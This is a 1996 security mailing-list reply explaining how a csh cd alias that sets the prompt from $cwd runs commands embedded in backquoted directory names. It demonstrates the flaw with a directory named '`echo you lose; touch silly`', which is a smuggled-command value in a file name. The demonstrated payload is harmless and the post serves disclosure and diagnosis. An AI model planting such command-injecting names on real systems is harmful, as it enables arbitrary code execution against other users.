mailing list archives
Re: tee see shell problems
From: szabo_p () maths su oz au (Paul Szabo)
Date: Wed, 18 Sep 1996 10:44:09 +1000
A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
out with BSDI anyway.) that allows the execution of arbitrary commands
when changing into directories that are enclosed with back tic's.
It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
drwx------ 2 psz system 512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
-rw------- 1 psz system 0 Sep 18 10:28 silly
Paul Szabo - System Manager // School of Mathematics and Statistics
psz () maths usyd edu au // University of Sydney, NSW 2006, Australia